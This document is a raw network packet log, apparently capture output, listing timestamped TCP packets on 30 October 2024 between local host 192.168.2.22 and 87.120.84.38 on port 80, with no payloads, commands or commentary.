                                                                                                                                                                                  Oct 30, 2024 08:37:30.060767889 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060786009 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060800076 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060822010 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060841084 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.060877085 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061609030 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061690092 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061733961 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061769009 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061789989 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061815023 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061819077 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.061863899 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230618954 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230700016 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230736017 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230786085 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230854034 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230887890 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230890989 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230890989 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230890989 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230890989 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230921984 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230954885 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230981112 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230981112 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230981112 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.230989933 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231010914 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231024981 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231057882 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231066942 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231090069 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231108904 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231126070 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231159925 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231178045 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231193066 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231220961 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231228113 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231246948 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231261015 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231280088 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231328964 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231334925 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231364965 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231379032 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231401920 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231404066 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231424093 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231437922 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231451988 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231472015 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231484890 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231520891 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231522083 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231560946 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231575966 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231611013 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.231614113 CET4916380192.168.2.2287.120.84.38
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Oct 30, 2024 08:37:30.231645107 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.231664896 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.231679916 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.231704950 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.231726885 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.231731892 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.231765032 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.231765032 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.231786013 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.231800079 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.231821060 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.231834888 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.231846094 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.231888056 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.231915951 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.231928110 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.231966972 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.231973886 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232017994 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232018948 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232049942 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232057095 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232078075 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232084990 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232096910 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232117891 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232135057 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232151985 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232172966 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232184887 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232202053 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232219934 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232239962 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232253075 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232275963 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232306004 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232327938 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232489109 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232522011 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232569933 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232569933 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232573986 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232605934 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232629061 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232640982 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232652903 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232676029 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232692957 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232712984 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232733011 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232742071 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.232770920 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232790947 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.232995987 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.233047962 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.233064890 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.233082056 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.233105898 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.233115911 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.233135939 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.233151913 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.233175039 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.233185053 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.233211994 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.233218908 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.233231068 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.233252048 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.233275890 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.233288050 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.233299017 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.233339071 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.239101887 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.239155054 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.239192009 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.239228010 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.240648031 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.240681887 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.240720987 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.240734100 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.240742922 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.240768909 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.240794897 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.240803957 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.240819931 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.240838051 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.240859032 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.240873098 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.240896940 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.240936041 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.244818926 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.244868994 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.244900942 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.244919062 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.244925022 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.244951963 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.244971991 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.244987965 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245002031 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245021105 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245039940 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245073080 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245085955 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245107889 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245141983 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245141983 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245157957 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245191097 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245213032 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245224953 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245255947 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245258093 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245276928 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245292902 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245311975 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245328903 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245347977 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245362997 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245383024 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245398045 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245424032 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245430946 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245465040 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245465040 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245486021 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245498896 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245524883 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245536089 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245543957 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245579958 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245634079 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245685101 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245693922 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245732069 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245735884 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245769978 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245796919 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245801926 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245816946 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245835066 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245856047 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245884895 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245886087 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245918989 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245937109 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245953083 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.245975971 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.245986938 CET  80           49163      87.120.84.38   192.168.2.22
Oct 30, 2024 08:37:30.246007919 CET  49163        80         192.168.2.22   87.120.84.38
Oct 30, 2024 08:37:30.246021032 CET  80           49163      87.120.84.38   192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.246037006 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.246054888 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.246074915 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.246088982 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.246104002 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.246140957 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.405819893 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.405858994 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.405878067 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.405894041 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.405920029 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.405934095 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.405951023 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.405982971 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.405997992 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406021118 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406028986 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406029940 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406029940 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406029940 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406029940 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406029940 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406038046 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406055927 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406085014 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406085014 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406085014 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406085014 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406097889 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406173944 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406188011 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406215906 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406232119 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406353951 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406404018 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406443119 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406457901 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406492949 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406497955 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406506062 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406512976 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406536102 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406538963 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406553030 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406554937 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406570911 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406570911 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406588078 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406591892 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406603098 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406610012 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406626940 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406645060 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406760931 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406789064 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406801939 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406811953 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406827927 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406843901 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406855106 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406872034 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406887054 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406898022 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406903028 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406914949 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406932116 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.406951904 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407027960 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407074928 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407077074 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407093048 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407116890 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407124996 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407139063 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407160997 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407166004 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407202959 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407202959 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407242060 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407295942 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407344103 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407396078 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407433033 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407445908 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407448053 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407473087 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407489061 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407516003 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407530069 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407546997 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407555103 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407563925 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407572985 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407581091 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407587051 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407597065 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407605886 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407624006 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407641888 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407746077 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407795906 CET4916380192.168.2.2287.120.84.38
